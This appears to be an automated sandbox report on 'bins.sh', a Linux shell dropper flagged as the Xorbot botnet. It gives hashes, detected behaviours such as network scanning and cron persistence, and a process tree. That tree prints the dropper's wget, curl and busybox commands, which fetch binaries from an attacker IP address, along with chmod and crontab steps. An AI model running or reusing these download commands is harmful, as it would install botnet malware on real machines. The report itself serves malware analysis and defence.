Analysis
-
max time kernel
149s -
max time network
147s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18-02-2025 04:37
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
d86eaa590e3754b5c5f7d3d48aafc640
-
SHA1
c8813488f1208356ead6dd49754edc1174f266a7
-
SHA256
01762bbc6774c58954d2aef154149f25d195340c877348cbd061e6f3c429d8bd
-
SHA512
a6833d3c8ca3415c2b90966fcaf03a680be87a3edc4bd88fab1151486c9b92c611705d5560a3284f3bb4cdfeaeae6ba3dab3d945925e45ad9857a4c63c8ec449
-
SSDEEP
192:3eJJWK7i21QAcr/mRxEpVsP/GsiJzTi21QAEr/mRxYpVsP/l:3eJJWKMpVsP/GsiJz0pVsP/l
Malware Config
Signatures
-
resource yara_rule behavioral1/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (2180) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1518 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP 1519 bins.sh -
Renames itself 1 IoCs
pid Process 1520 bins.sh -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.F4fSHF crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/1643/cmdline bins.sh File opened for reading /proc/1675/cmdline bins.sh File opened for reading /proc/1677/cmdline bins.sh File opened for reading /proc/1713/cmdline bins.sh File opened for reading /proc/733/cmdline bins.sh File opened for reading /proc/1558/cmdline bins.sh File opened for reading /proc/1513/cmdline bins.sh File opened for reading /proc/1582/cmdline bins.sh File opened for reading /proc/1686/cmdline bins.sh File opened for reading /proc/9/cmdline bins.sh File opened for reading /proc/504/cmdline bins.sh File opened for reading /proc/927/cmdline bins.sh File opened for reading /proc/1081/cmdline bins.sh File opened for reading /proc/1358/cmdline bins.sh File opened for reading /proc/1609/cmdline bins.sh File opened for reading /proc/1662/cmdline bins.sh File opened for reading /proc/1663/cmdline bins.sh File opened for reading /proc/84/cmdline bins.sh File opened for reading /proc/493/cmdline bins.sh File opened for reading /proc/1679/cmdline bins.sh File opened for reading /proc/1693/cmdline bins.sh File opened for reading /proc/1547/cmdline bins.sh File opened for reading /proc/1574/cmdline bins.sh File opened for reading /proc/1645/cmdline bins.sh File opened for reading /proc/166/cmdline bins.sh File opened for reading /proc/1151/cmdline bins.sh File opened for reading /proc/1556/cmdline bins.sh File opened for reading /proc/1587/cmdline bins.sh File opened for reading /proc/13/cmdline bins.sh File opened for reading /proc/1298/cmdline bins.sh File opened for reading /proc/1183/cmdline bins.sh File opened for reading /proc/1212/cmdline bins.sh File opened for reading /proc/1539/cmdline bins.sh File opened for reading /proc/1617/cmdline bins.sh File opened for reading /proc/1672/cmdline bins.sh File opened for reading /proc/11/cmdline bins.sh File opened for reading /proc/165/cmdline bins.sh File opened for reading /proc/1692/cmdline bins.sh File opened for reading /proc/1700/cmdline bins.sh File opened for reading /proc/1705/cmdline bins.sh File opened for reading /proc/480/cmdline bins.sh File opened for reading /proc/1135/cmdline bins.sh File opened for reading /proc/1570/cmdline bins.sh File opened for reading /proc/1575/cmdline bins.sh File opened for reading /proc/684/cmdline bins.sh File opened for reading /proc/1561/cmdline bins.sh File opened for reading /proc/503/cmdline bins.sh File opened for reading /proc/690/cmdline bins.sh File opened for reading /proc/1197/cmdline bins.sh File opened for reading /proc/1543/cmdline bins.sh File opened for reading /proc/1653/cmdline bins.sh File opened for reading /proc/1685/cmdline bins.sh File opened for reading /proc/98/cmdline bins.sh File opened for reading /proc/172/cmdline bins.sh File opened for reading /proc/1098/cmdline bins.sh File opened for reading /proc/1170/cmdline bins.sh File opened for reading /proc/176/cmdline bins.sh File opened for reading /proc/1088/cmdline bins.sh File opened for reading /proc/1640/cmdline bins.sh File opened for reading /proc/1733/cmdline bins.sh File opened for reading /proc/6/cmdline bins.sh File opened for reading /proc/674/cmdline bins.sh File opened for reading /proc/34/cmdline bins.sh File opened for reading /proc/174/cmdline bins.sh -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP wget File opened for modification /tmp/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP curl File opened for modification /tmp/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP busybox File opened for modification /tmp/dON7rUFpfrbJCR3z46HsdnNPXsu1LTNVTi wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1510 -
/bin/rm/bin/rm bins.sh2⤵PID:1511
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP2⤵
- Writes file to tmp directory
PID:1512
-
-
/usr/bin/curlcurl -O http://37.44.238.88/bins/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP2⤵
- Writes file to tmp directory
PID:1516
-
-
/bin/busybox/bin/busybox wget http://37.44.238.88/bins/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/chmodchmod 777 YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/usr/bin/crontabcrontab -l2⤵PID:1522
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1524
-
-
/bin/rmrm YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP2⤵PID:1526
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/dON7rUFpfrbJCR3z46HsdnNPXsu1LTNVTi2⤵
- Writes file to tmp directory
PID:1529
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
91KB
MD57797c982303d052585ffd5c8d9019e45
SHA197f1f756302271140b77fff520daa4dce951d0aa
SHA256a4fc787c532b2b2a536450c4f0fe5ec62998b2315dfb54f345511f0be30a96a6
SHA512abc4ba50566ec300dc4187d6566aa833d4c5fc47a7bcb8b037f1d9d6731b2e7bbb5bd70c05c60cbdb4a2b115edf44fdcfce258966ebc3b94aff158c975163969
-
Filesize
210B
MD556af23b90274de76d68f60a6079a4dc9
SHA1122ee6a25731c3d9a850dd28fb84bc156ed5e044
SHA25641d042537fa353ca75498115548c1522e94a5c1552c7de8bd8aee35b53c955cb
SHA5127c811cef7aa4dc78245777c882aa1099347f7e86cc394d7487152c05a798be8d9dda1a8f4c15a0c686c21d64f431091b42996c855de897f96d06160dcc8574f0